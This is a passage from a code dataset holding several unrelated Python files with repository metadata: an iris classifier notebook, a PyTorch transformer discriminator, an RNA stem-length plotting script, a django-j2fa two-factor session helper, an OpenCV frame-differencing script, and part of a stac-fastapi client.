In[51]:\n\n\niris=iris[['sepal_length','petal_length','species']]\n\niris.head()\n\n\n# In[52]:\n\n\niris['species'].value_counts()\n\n\n# In[53]:\n\n\niris.isnull().sum()\n\n\n# In[54]:\n\n\nsns.pairplot(iris,hue='species')\n\n\n# In[55]:\n\n\nfrom sklearn.preprocessing import LabelEncoder\nmodel = LabelEncoder()\n\n\n# In[56]:\n\n\niris['species'] = model.fit_transform(iris['species'])\n\n\n# In[57]:\n\n\niris.head()\n\n\n# In[58]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n# In[59]:\n\n\nx_train,x_test,y_train,y_test=train_test_split(iris.drop(columns=['species']),iris['species'], test_size=0.3)\nx_train.shape,x_test.shape\n\n\n# In[60]:\n\n\nfrom sklearn.linear_model import LogisticRegression\nmodel=LogisticRegression()\nmodel.fit(x_train,y_train)\n\n\n# In[61]:\n\n\nfrom sklearn.metrics import accuracy_score\npred=model.predict(x_test)\naccuracy_score(y_test,pred)\n\n\n# In[62]:\n\n\nfrom sklearn.neighbors import KNeighborsClassifier\nmodel=KNeighborsClassifier()\n\n\n# In[63]:\n\n\nmodel.fit(x_train,y_train)\n\n\n# In[64]:\n\n\npred1=model.predict(x_test)\naccuracy_score(y_test,pred1)\n\n\n# In[65]:\n\n\nfrom sklearn.tree import DecisionTreeClassifier\ndef training_model():\n model=DecisionTreeClassifier()\n trained_model = model.fit(x_train,y_train)\n return trained_model\n\n\n# In[66]:\n\n\npred2=model.predict(x_test)\naccuracy_score(y_test,pred2)*100\n\n\n# In[67]:\n\n\npred2\n\n\n# In[68]:\n\n\nx_test.head()\n\n\n# In[69]:\n\n\nimport pickle\n\n\n# In[70]:\n\n\npickle.dump(model,open('model.pkl', 'wb'))\n\n\n# In[71]:\n\n\nload_model=pickle.load(open('model.pkl','rb'))\n\n\n# In[72]:\n\n\nload_model.predict([[7.7,6.9]])\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "githubcodingjoiner/IRIS_SPECIES_CLASSIFIER", "sub_path": "iris.py", "file_name": "iris.py", "file_ext": "py", "file_size_in_byte": 2036, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "seaborn.get_dataset_names", "line_number": 16, "usage_type": "call"}, {"api_name": "seaborn.load_dataset", "line_number": 22, "usage_type": "call"}, {"api_name": "seaborn.pairplot", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 91, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 115, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 123, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 132, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 139, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 152, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 160, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 169, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 193, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 199, "usage_type": "call"}]} +{"seq_id": "22067257577", "text": "import torch\r\nimport torch.nn as nn\r\nimport torch.nn.init as init\r\nimport torch.optim as optim\r\nimport math\r\n\r\n\r\n\r\nclass PositionalEncoding(nn.Module):\r\n\r\n def __init__(self, d_model, dropout=0.1, max_len=5000):\r\n super(PositionalEncoding, self).__init__()\r\n self.dropout = nn.Dropout(p=dropout)\r\n\r\n pe = torch.zeros(max_len, d_model)\r\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\r\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))\r\n pe[:, 0::2] = torch.sin(position * div_term)\r\n pe[:, 1::2] = torch.cos(position * div_term)\r\n pe = pe.unsqueeze(0).transpose(0, 1)\r\n self.register_buffer('pe', pe)\r\n\r\n def forward(self, x):\r\n x = x + self.pe[:x.size(0), :]\r\n return self.dropout(x)\r\n\r\n\r\nclass TransformerModel(nn.Module):\r\n\r\n def __init__(self, ntoken, ninp, nhead, nhid, nlayers, device,dropout=0.5):\r\n super(TransformerModel, self).__init__()\r\n from torch.nn import TransformerEncoder, TransformerEncoderLayer\r\n self.model_type = 'Transformer'\r\n self.pos_encoder = PositionalEncoding(ninp, dropout).to(device)\r\n encoder_layers = TransformerEncoderLayer(ninp, nhead, nhid, dropout).to(device)\r\n self.transformer_encoder = TransformerEncoder(encoder_layers, nlayers).to(device)\r\n self.encoder = nn.Embedding(ntoken, ninp).to(device)\r\n self.ninp = ninp\r\n print(ntoken*ninp)\r\n self.decoder = nn.Linear(ntoken*ninp, 2).to(device)\r\n self.device= device\r\n self.sigmoid= nn.Sigmoid().to(device)\r\n\r\n self.init_weights()\r\n\r\n def generate_square_subsequent_mask(self, sz):\r\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\r\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))\r\n return mask.to(self.device)\r\n\r\n def init_weights(self):\r\n initrange = 0.1\r\n self.encoder.weight.data.uniform_(-initrange, initrange)\r\n self.decoder.bias.data.zero_()\r\n self.decoder.weight.data.uniform_(-initrange, initrange)\r\n\r\n def forward(self, src, src_mask):\r\n # src = self.encoder(src) * math.sqrt(self.ninp)\r\n inp=src\r\n src= src.to(self.device)\r\n self.pos_encoder= self.pos_encoder.to(self.device)\r\n src = self.pos_encoder(src)\r\n output = self.transformer_encoder(src, src_mask)\r\n output= output.view(inp.shape[0],-1)\r\n # print(output.shape)\r\n # print(output.shape)\r\n output = self.decoder(output)\r\n output =self.sigmoid(output)\r\n return output\r\n# i am not passing positional encoding\r\nif __name__==\"__main__\":\r\n\r\n ntokens = 50 # the size of vocabulary\r\n emsize = 1024 # embedding dimension\r\n nhid = 1024 # the dimension of the feedforward network model in nn.TransformerEncoder\r\n nlayers = 2 # the number of nn.TransformerEncoderLayer in nn.TransformerEncoder\r\n nhead = 2 # the number of heads in the multiheadattention models\r\n dropout = 0.2 # the dropout value\r\n device=torch.device(\"cpu\")\r\n model = TransformerModel(ntokens, emsize, nhead, nhid, nlayers, device,dropout)\r\n\r\n src = torch.rand((10, 50, 1024))\r\n tgt = torch.rand((20, 50, 1024))\r\n src_mask = model.generate_square_subsequent_mask(src.size(0))\r\n output = model(src, src_mask)\r\n print(output.shape)\r\n", "repo_name": "gulzainali98/pytorch-reinforce", "sub_path": "transformer_discriminator.py", "file_name": "transformer_discriminator.py", "file_ext": "py", "file_size_in_byte": 3420, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.exp", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 17, "usage_type": "call"}, {"api_name": "math.log", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.sin", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.cos", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.TransformerEncoderLayer", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn.TransformerEncoder", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.triu", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 79, "usage_type": "call"}, {"api_name": "{'TransformerEncoder': 'torch.nn.TransformerEncoder', 'TransformerEncoderLayer': 'torch.nn.TransformerEncoderLayer'}", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "31158263309", "text": "import sys, re, math\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport subprocess\n\n#############\n#Subroutines#\n#############\n\ndef get_stem_lengths(tabbed_struc_file):\n mod_stem_lengths = []\n orig_stem_lengths = []\n stem_length_differences = []\n with open(tabbed_struc_file, 'r') as F:\n for line in F:\n if not line.startswith(\"#\"):\n rna_id,seq,mod_struc,orig_struc = line.strip().split('\\t')\n if seq is not None:\n orig_stem_length = min(orig_struc.count('('), orig_struc.count(')'))\n mod_stem_length = min(mod_struc.count('('), mod_struc.count(')'))\n mod_stem_lengths.append(mod_stem_length)\n orig_stem_lengths.append(orig_stem_length)\n stem_length_differences.append((mod_stem_length-orig_stem_length)/orig_stem_length)\n F.close()\n return mod_stem_lengths, orig_stem_lengths,stem_length_differences\n\n######\n#Main#\n######\n\nusage = \"usage: \" + sys.argv[0] + \" <T1000 hairpin tabbed structure file> <control hairpin tabbed structure file> <scatterplot filename>\"\nif len(sys.argv) != 4:\n print(usage)\n sys.exit()\n\nT1000_struc_file = sys.argv[1]\ncontrol_struc_file = sys.argv[2]\nfigure_file = sys.argv[3]\n\nmod_T1000_stem_lengths, orig_T1000_stem_lengths,T1000_stem_change = get_stem_lengths(T1000_struc_file)\nmod_control_stem_lengths, orig_control_stem_lengths,control_stem_change = get_stem_lengths(control_struc_file)\n\n\n\nmplot = plt.figure()\nvplot = plt.violinplot([control_stem_change,T1000_stem_change])\n#plt.ylabel(\"Fractional change in stem length after random insertion\")\ncolors = [\"#92c5de\", \"#ca0020\"]\nfor patch,color in zip(vplot['bodies'], colors):\n patch.set_facecolor(color)\n\nmplot.set_figwidth(3)\nmplot.set_figheight(3)\n#plt.scatter(orig_control_stem_lengths, mod_control_stem_lengths,s=5,color = \"#ca0020\")\n#plt.scatter(orig_T1000_stem_lengths, mod_T1000_stem_lengths,s=5,color = \"#92c5de\")\n#plt.xlabel('Stem Length of Hairpin before Deletion')\n#plt.ylabel('Stem Length of Hairpin after Deletion')\nplt.savefig(figure_file)\n", "repo_name": "alyssapratt/unbreakable-hairpins", "sub_path": "Graphs and statistical tests/plot_stem_length_change.py", "file_name": "plot_stem_length_change.py", "file_ext": "py", "file_size_in_byte": 2137, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.use", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 32, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 33, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 37, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 38, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 39, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.violinplot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "73639137126", "text": "import logging\nfrom j2fa.models import TwoFactorSession\nfrom django.conf import settings\nfrom ipware.ip import get_client_ip # type: ignore # pytype: disable=import-error\nfrom django.http import HttpRequest\n\nlogger = logging.getLogger(__name__)\n\n\ndef auth_2fa(request: HttpRequest, user, reason: str = \"\"):\n \"\"\"\n By-pass 2FA requirement for this user session.\n Call auth.login() before this function if the user is not logged in yet.\n :param request:\n :param user:\n :param reason: Optional reason for by-passing 2FA, e.g. \"bank ID\". Just stored in log.\n :return:\n \"\"\"\n ip = get_client_ip(request)[0]\n if ip is None and settings.DEBUG:\n ip = \"127.0.0.1\"\n user_agent = request.META[\"HTTP_USER_AGENT\"]\n ses = TwoFactorSession.objects.create(\n user=user,\n ip=ip,\n user_agent=user_agent[:512],\n phone=\"\",\n email=user.email,\n code=\"\",\n )\n assert isinstance(ses, TwoFactorSession)\n request.session[\"j2fa_session\"] = ses.id\n ses.activate()\n logger.info(\"User %s (IP %s) 2FA requirement by-passed (reason: %s)\", user, ip, reason)\n", "repo_name": "kajala/django-j2fa", "sub_path": "j2fa/services.py", "file_name": "services.py", "file_ext": "py", "file_size_in_byte": 1123, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "django.http.HttpRequest", "line_number": 10, "usage_type": "name"}, {"api_name": "ipware.ip.get_client_ip", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.settings.DEBUG", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "j2fa.models.TwoFactorSession.objects.create", "line_number": 23, "usage_type": "call"}, {"api_name": "j2fa.models.TwoFactorSession.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "j2fa.models.TwoFactorSession", "line_number": 23, "usage_type": "name"}, {"api_name": "j2fa.models.TwoFactorSession", "line_number": 31, "usage_type": "argument"}]} +{"seq_id": "4298236535", "text": "import cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(\"C:\\\\vscode\\\\Teknofest\\\\klasor11\\\\car.mp4\")\n\n_,first_frame = cap.read()\n\nfirst_frame =cv2.resize(first_frame,(640,480))\n\nfirst_gray = cv2.cvtColor(first_frame,cv2.COLOR_BGR2GRAY) \n\nfirst_gray = cv2.GaussianBlur(first_gray,(5,5),0)\n\n\nwhile 1 :\n\n _,frame = cap.read()\n frame = cv2.resize(frame,(640,480))\n\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY) \n\n gray = cv2.GaussianBlur(gray,(5,5),0)\n\n diff = cv2.absdiff(first_gray,gray) # ilk frame ile tüm frameleri tek tek karşılaştırmayı sağlar.\n\n _,diff = cv2.threshold(diff,25,255,cv2.THRESH_BINARY)\n\n\n\n cv2.imshow(\"frame\",frame)\n cv2.imshow(\"first\",first_frame)\n cv2.imshow(\"diff\",diff)\n\n if cv2.waitKey(20) & 0xFF == ord(\"q\"):\n break\n\n\n\n\ncap.release()\ncv2.destroyAllWindows()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "Yusufygc/GoruntuIsleme", "sub_path": "klasor11/arka_plan_cikarma.py", "file_name": "arka_plan_cikarma.py", "file_ext": "py", "file_size_in_byte": 868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.VideoCapture", "line_number": 4, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.GaussianBlur", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cv2.GaussianBlur", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.absdiff", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.threshold", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "41945684991", "text": "\"\"\"Item crud client.\"\"\"\nimport json\nimport logging\nfrom datetime import datetime\nfrom typing import List, Optional, Type, Union\nfrom urllib.parse import urljoin\n\nimport attr\nfrom fastapi import HTTPException\n\n# from geojson_pydantic.geometries import Polygon\nfrom pydantic import ValidationError\nfrom stac_pydantic.links import Relations\nfrom stac_pydantic.shared import MimeTypes\n\nfrom stac_fastapi.nodb import serializers\nfrom stac_fastapi.nodb.config import Tile38Settings\nfrom stac_fastapi.nodb.session import Session\nfrom stac_fastapi.nodb.transactions import COLLECTIONS\n\nfrom stac_fastapi.types.core import BaseCoreClient\nfrom stac_fastapi.types.errors import NotFoundError\nfrom stac_fastapi.types.search import BaseSearchPostRequest\nfrom stac_fastapi.types.stac import Collection, Collections, Item, ItemCollection\nfrom stac_fastapi.nodb.transactions import COLLECTIONS\n\nlogger = logging.getLogger(__name__)\n\nNumType = Union[float, int]\n\n\n@attr.s\nclass CoreCrudClient(BaseCoreClient):\n \"\"\"Client for core endpoints defined by stac.\"\"\"\n\n session: Session = attr.ib(default=attr.Factory(Session.create_from_env))\n item_serializer: Type[serializers.Serializer] = attr.ib(\n default=serializers.ItemSerializer\n )\n collection_serializer: Type[serializers.Serializer] = attr.ib(\n default=serializers.CollectionSerializer\n )\n settings = Tile38Settings()\n client = settings.create_tile_38_client\n redis_client = settings.create_redis_client\n\n @staticmethod\n def _lookup_id(id: str, table, session):\n \"\"\"Lookup row by id.\"\"\"\n pass\n\n def all_collections(self, **kwargs) -> Collections:\n \"\"\"Read all collections from the database.\"\"\"\n base_url = str(kwargs[\"request\"].base_url)\n collections = []\n collection_ids = self.redis_client.smembers(\"collections\")\n\n for collection in collection_ids:\n collections.append(self.redis_client.json().get(collection))\n\n if len(collections) == 0:\n raise NotFoundError(\"No collections exist\")\n serialized_collections = [\n self.collection_serializer.db_to_stac(\n collection, base_url=base_url\n )\n for collection in collections\n ]\n links = [\n {\n \"rel\": Relations.root.value,\n \"type\": MimeTypes.json,\n \"href\": base_url,\n },\n {\n \"rel\": Relations.parent.value,\n \"type\": MimeTypes.json,\n \"href\": base_url,\n },\n {\n \"rel\": Relations.self.value,\n \"type\": MimeTypes.json,\n \"href\": urljoin(base_url, \"collections\"),\n },\n ]\n collection_list = Collections(\n collections=serialized_collections or [], links=links\n )\n return collection_list\n\n def get_collection(self, collection_id: str, **kwargs) -> Collection:\n \"\"\"Get collection by id.\"\"\"\n base_url = str(kwargs[\"request\"].base_url)\n\n collection = self.redis_client.json().get(collection_id)\n if collection:\n return self.collection_serializer.db_to_stac(collection, base_url)\n else:\n raise NotFoundError(f\"Collection {collection_id} not found\")\n\n def item_collection(\n self, collection_id: str, limit: int = 10, **kwargs\n ) -> ItemCollection:\n \"\"\"Read an item collection from the database.\"\"\"\n pass\n # links = []\n # base_url = str(kwargs[\"request\"].base_url)\n # search = Search(using=self.client, index=\"stac_items\")\n\n # collection_filter = Q(\n # \"bool\", should=[Q(\"match_phrase\", **{\"collection\": collection_id})]\n # )\n # search = search.query(collection_filter)\n # try:\n # count = search.count()\n # except elasticsearch.exceptions.NotFoundError:\n # raise NotFoundError(\"No items exist\")\n # # search = search.sort({\"id.keyword\" : {\"order\" : \"asc\"}})\n # search = search.query()[0:limit]\n # collection_children = search.execute().to_dict()\n\n # serialized_children = [\n # self.item_serializer.db_to_stac(item[\"_source\"], base_url=base_url)\n # for item in collection_children[\"hits\"][\"hits\"]\n # ]\n\n # context_obj = None\n # if self.extension_is_enabled(\"ContextExtension\"):\n # context_obj = {\n # \"returned\": count if count < limit else limit,\n # \"limit\": limit,\n # \"matched\": count,\n # }\n\n # return ItemCollection(\n # type=\"FeatureCollection\",\n # features=serialized_children,\n # links=links,\n # context=context_obj,\n # )\n\n def get_item(self, item_id: str, collection_id: str, **kwargs) -> Item:\n \"\"\"Get item by item id, collection id.\"\"\"\n base_url = str(kwargs[\"request\"].base_url)\n item = self.redis_client.json().get(item_id)\n if item:\n return self.item_serializer.db_to_stac(item, base_url)\n else:\n raise NotFoundError(f\"Item {item_id} does not exist in Collection {collection_id}\")\n\n # def _return_date(self, datetime):\n # datetime = datetime.split(\"/\")\n # if len(datetime) == 1:\n # datetime = datetime[0][0:19] + \"Z\"\n # return {\"eq\": datetime}\n # else:\n # start_date = datetime[0]\n # end_date = datetime[1]\n # if \"..\" not in datetime:\n # start_date = start_date[0:19] + \"Z\"\n # end_date = end_date[0:19] + \"Z\"\n # elif start_date != \"..\":\n # start_date = start_date[0:19] + \"Z\"\n # end_date = \"2200-12-01T12:31:12Z\"\n # elif end_date != \"..\":\n # start_date = \"1900-10-01T00:00:00Z\"\n # end_date = end_date[0:19] + \"Z\"\n # else:\n # start_date = \"1900-10-01T00:00:00Z\"\n # end_date = \"2200-12-01T12:31:12Z\"\n\n # return {\"lte\": end_date, \"gte\": start_date}\n\n def get_search(\n self,\n collections: Optional[List[str]] = None,\n ids: Optional[List[str]] = None,\n bbox: Optional[List[NumType]] = None,\n datetime: Optional[Union[str, datetime]] = None,\n limit: Optional[int] = 10,\n query: Optional[str] = None,\n token: Optional[str] = None,\n fields: Optional[List[str]] = None,\n sortby: Optional[str] = None,\n **kwargs,\n ) -> ItemCollection:\n \"\"\"GET search catalog.\"\"\"\n pass\n # base_args = {\n # \"collections\": collections,\n # \"ids\": ids,\n # \"bbox\": bbox,\n # \"limit\": limit,\n # \"token\": token,\n # \"query\": json.loads(query) if query else query,\n # }\n # if datetime:\n # base_args[\"datetime\"] = datetime\n # if sortby:\n # # https://github.com/radiantearth/stac-spec/tree/master/api-spec/extensions/sort#http-get-or-post-form\n # sort_param = []\n # for sort in sortby:\n # sort_param.append(\n # {\n # \"field\": sort[1:],\n # \"direction\": \"asc\" if sort[0] == \"+\" else \"desc\",\n # }\n # )\n # base_args[\"sortby\"] = sort_param\n\n # # if fields:\n # # includes = set()\n # # excludes = set()\n # # for field in fields:\n # # if field[0] == \"-\":\n # # excludes.add(field[1:])\n # # elif field[0] == \"+\":\n # # includes.add(field[1:])\n # # else:\n # # includes.add(field)\n # # base_args[\"fields\"] = {\"include\": includes, \"exclude\": excludes}\n\n # # Do the request\n # try:\n # search_request = self.post_request_model(**base_args)\n # except ValidationError:\n # raise HTTPException(status_code=400, detail=\"Invalid parameters provided\")\n # resp = self.post_search(search_request, request=kwargs[\"request\"])\n\n # return resp\n\n # def bbox2poly(self, b0, b1, b2, b3):\n # \"\"\"Transform bbox to polygon.\"\"\"\n # poly = [[[b0, b1], [b2, b1], [b2, b3], [b0, b3], [b0, b1]]]\n # return poly\n\n def post_search(\n self, search_request: BaseSearchPostRequest, **kwargs\n ) -> ItemCollection:\n \"\"\"POST search catalog.\"\"\"\n pass\n # base_url = str(kwargs[\"request\"].base_url)\n # search = Search(using=self.client, index=\"stac_items\")\n\n # if search_request.query:\n # if type(search_request.query) == str:\n # search_request.query = json.loads(search_request.query)\n # for (field_name, expr) in search_request.query.items():\n # field = \"properties__\" + field_name\n # for (op, value) in expr.items():\n # if op != \"eq\":\n # key_filter = {field: {f\"{op}\": value}}\n # search = search.query(Q(\"range\", **key_filter))\n # else:\n # search = search.query(\"match_phrase\", **{field: value})\n\n # if search_request.ids:\n # id_list = []\n # for item_id in search_request.ids:\n # id_list.append(Q(\"match_phrase\", **{\"id\": item_id}))\n # id_filter = Q(\"bool\", should=id_list)\n # search = search.query(id_filter)\n\n # if search_request.collections:\n # collection_list = []\n # for collection_id in search_request.collections:\n # collection_list.append(\n # Q(\"match_phrase\", **{\"collection\": collection_id})\n # )\n # collection_filter = Q(\"bool\", should=collection_list)\n # search = search.query(collection_filter)\n\n # if search_request.datetime:\n # datetime_search = self._return_date(search_request.datetime)\n # if \"eq\" in datetime_search:\n # search = search.query(\n # \"match_phrase\", **{\"properties__datetime\": datetime_search[\"eq\"]}\n # )\n # else:\n # search = search.filter(\n # \"range\", properties__datetime={\"lte\": datetime_search[\"lte\"]}\n # )\n # search = search.filter(\n # \"range\", properties__datetime={\"gte\": datetime_search[\"gte\"]}\n # )\n\n # if search_request.bbox:\n # bbox = search_request.bbox\n # if len(bbox) == 6:\n # bbox = [bbox[0], bbox[1], bbox[3], bbox[4]]\n # poly = self.bbox2poly(bbox[0], bbox[1], bbox[2], bbox[3])\n\n # bbox_filter = Q(\n # {\n # \"geo_shape\": {\n # \"geometry\": {\n # \"shape\": {\"type\": \"polygon\", \"coordinates\": poly},\n # \"relation\": \"intersects\",\n # }\n # }\n # }\n # )\n # search = search.query(bbox_filter)\n\n # if search_request.intersects:\n # intersect_filter = Q(\n # {\n # \"geo_shape\": {\n # \"geometry\": {\n # \"shape\": {\n # \"type\": search_request.intersects.type.lower(),\n # \"coordinates\": search_request.intersects.coordinates,\n # },\n # \"relation\": \"intersects\",\n # }\n # }\n # }\n # )\n # search = search.query(intersect_filter)\n\n # if search_request.sortby:\n # for sort in search_request.sortby:\n # if sort.field == \"datetime\":\n # sort.field = \"properties__datetime\"\n # field = sort.field + \".keyword\"\n # search = search.sort({field: {\"order\": sort.direction}})\n\n # try:\n # count = search.count()\n # except elasticsearch.exceptions.NotFoundError:\n # raise NotFoundError(\"No items exist\")\n\n # # search = search.sort({\"id.keyword\" : {\"order\" : \"asc\"}})\n # search = search.query()[0 : search_request.limit]\n # response = search.execute().to_dict()\n\n # if len(response[\"hits\"][\"hits\"]) > 0:\n # response_features = [\n # self.item_serializer.db_to_stac(item[\"_source\"], base_url=base_url)\n # for item in response[\"hits\"][\"hits\"]\n # ]\n # else:\n # response_features = []\n\n # # if self.extension_is_enabled(\"FieldsExtension\"):\n # # if search_request.query is not None:\n # # query_include: Set[str] = set(\n # # [\n # # k if k in Settings.get().indexed_fields else f\"properties.{k}\"\n # # for k in search_request.query.keys()\n # # ]\n # # )\n # # if not search_request.fields.include:\n # # search_request.fields.include = query_include\n # # else:\n # # search_request.fields.include.union(query_include)\n\n # # filter_kwargs = search_request.fields.filter_fields\n\n # # response_features = [\n # # json.loads(stac_pydantic.Item(**feat).json(**filter_kwargs))\n # # for feat in response_features\n # # ]\n\n # if search_request.limit:\n # limit = search_request.limit\n # response_features = response_features[0:limit]\n # else:\n # limit = 10\n # response_features = response_features[0:limit]\n # limit = 10\n # context_obj = None\n # if self.extension_is_enabled(\"ContextExtension\"):\n # context_obj = {\n # \"returned\": count if count < limit else limit,\n # \"limit\": limit,\n # \"matched\": count,\n # }\n\n # links = []\n # return ItemCollection(\n # type=\"FeatureCollection\",\n # features=response_features,\n # links=links,\n # context=context_obj,\n # )\n", "repo_name": "jonhealy1/stac-fastapi-nodb", "sub_path": "stac_fastapi/nodb/stac_fastapi/nodb/core.py", "file_name": "core.py", "file_ext": "py", "file_size_in_byte": 14437, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 29, "usage_type": "name"}, {"api_name": "stac_fastapi.types.core.BaseCoreClient", "line_number": 33, "usage_type": "name"}, {"api_name": "stac_fastapi.nodb.session.Session", "line_number": 36, "usage_type": "name"}, {"api_name": "attr.ib", "line_number": 36, "usage_type": "call"}, {"api_name": "attr.Factory", "line_number": 36, "usage_type": "call"}, {"api_name": "stac_fastapi.nodb.session.Session.create_from_env", "line_number": 36, "usage_type": "attribute"}, {"api_name": "typing.Type", "line_number": 37, "usage_type": "name"}, {"api_name": "stac_fastapi.nodb.serializers.Serializer", "line_number": 37, "usage_type": "attribute"}, {"api_name": "stac_fastapi.nodb.serializers", "line_number": 37, "usage_type": "name"}, {"api_name": "attr.ib", "line_number": 37, "usage_type": "call"}, {"api_name": "stac_fastapi.nodb.serializers.ItemSerializer", "line_number": 38, "usage_type": "attribute"}, {"api_name": "stac_fastapi.nodb.serializers", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 40, "usage_type": "name"}, {"api_name": "stac_fastapi.nodb.serializers.Serializer", "line_number": 40, "usage_type": "attribute"}, {"api_name": "stac_fastapi.nodb.serializers", "line_number": 40, "usage_type": "name"}, {"api_name": "attr.ib", "line_number": 40, "usage_type": "call"}, {"api_name": "stac_fastapi.nodb.serializers.CollectionSerializer", "line_number": 41, "usage_type": "attribute"}, {"api_name": "stac_fastapi.nodb.serializers", "line_number": 41, "usage_type": "name"}, {"api_name": "stac_fastapi.nodb.config.Tile38Settings", "line_number": 43, "usage_type": "call"}, {"api_name": "stac_fastapi.types.errors.NotFoundError", "line_number": 62, "usage_type": "call"}, {"api_name": "stac_pydantic.links.Relations.root", "line_number": 71, "usage_type": "attribute"}, {"api_name": "stac_pydantic.links.Relations", "line_number": 71, "usage_type": "name"}, {"api_name": 